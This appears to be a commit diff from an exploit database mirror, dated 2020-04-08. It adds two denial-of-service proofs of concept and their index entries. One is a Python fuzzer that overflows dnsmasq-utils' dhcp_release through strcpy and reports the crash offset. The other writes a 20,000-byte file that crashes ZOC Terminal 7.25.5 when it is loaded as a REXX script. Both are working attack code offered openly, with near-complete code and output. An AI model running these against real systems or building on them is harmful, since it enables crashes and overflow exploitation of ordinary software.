DB: 2020-04-08
2 changes to exploits/shellcodes dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC) ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)
This commit is contained in:
parent
85bef6929f
commit
36c65f8dd4
3 changed files with 61 additions and 0 deletions
38
exploits/linux/dos/48301.py
Executable file
38
exploits/linux/dos/48301.py
Executable file
|
@ -0,0 +1,38 @@
|
|||
# Exploit Title: dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)
|
||||
# Date: 2020-04-06
|
||||
# Exploit Author: Josue Encinar
|
||||
# Software Link: https://launchpad.net/ubuntu/+source/dnsmasq/2.79-1
|
||||
# Version: 2.79
|
||||
# Tested on: Ubuntu 18.04
|
||||
|
||||
|
||||
from subprocess import Popen, PIPE
|
||||
|
||||
data = ""
|
||||
bof = False
|
||||
for i in range (1, 200):
|
||||
A = "A"*i
|
||||
data = f"dhcp_release {A} 1 1"
|
||||
try:
|
||||
result = Popen(data, stdout=PIPE, stderr=PIPE, shell=True)
|
||||
error = result.stderr.read().decode()
|
||||
if "Aborted (core dumped)" in error:
|
||||
print("[+] Buffer Overflow detected!")
|
||||
print(f"[*] Offset: {i}")
|
||||
bof = True
|
||||
break
|
||||
except Exception as e:
|
||||
print(f"[-] {e}")
|
||||
|
||||
if not bof:
|
||||
print("[-] No buffer overflow...")
|
||||
|
||||
|
||||
## Check line 273 in dhcp_release.c
|
||||
### strcpy(ifr.ifr_name, argv[1]);
|
||||
#
|
||||
## PoC:
|
||||
# josue@ubuntu:~/Escritorio/bof_dhcp$ python3 dhcp_release_bof.py
|
||||
# *** buffer overflow detected ***: dhcp_release terminated
|
||||
# [+] Buffer Overflow detected!
|
||||
# [*] Offset: 16
|
21
exploits/windows/dos/48302.py
Executable file
21
exploits/windows/dos/48302.py
Executable file
|
@ -0,0 +1,21 @@
|
|||
# Exploit Title: ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)
|
||||
# Discovery by: chuyreds
|
||||
# Discovery Date: 2020-04-05
|
||||
# Vendor Homepage: https://www.emtec.com
|
||||
# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
|
||||
# Tested Version: 7.25.5
|
||||
# Vulnerability Type: Local
|
||||
# Tested on OS: Windows 10 Pro x64 es
|
||||
|
||||
# Steps to produce the crash:
|
||||
# 1.- Run python code: ZOC_7.25.5_Script.py and it will create a new file "exp.zrx"
|
||||
# 2.- Open ZOC Terminal
|
||||
# 3.- Select Script > Start REXX Script...
|
||||
# 4.- Select "ZOC_7.25.5_Script.zrx" file and click "open"
|
||||
# 5.- Crashed
|
||||
|
||||
cod = "\x41" * 20000
|
||||
|
||||
f = open('ZOC_7.25.5_Script.zrx', 'w')
|
||||
f.write(cod)
|
||||
f.close()
|
|
@ -6700,6 +6700,8 @@ id,file,description,date,author,type,platform,port
|
|||
48290,exploits/windows/dos/48290.py,"UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
|
||||
48291,exploits/windows/dos/48291.py,"UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
|
||||
48292,exploits/windows/dos/48292.txt,"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
|
||||
48301,exploits/linux/dos/48301.py,"dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)",2020-04-07,JosueEncinar,dos,linux,
|
||||
48302,exploits/windows/dos/48302.py,"ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)",2020-04-07,chuyreds,dos,windows,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue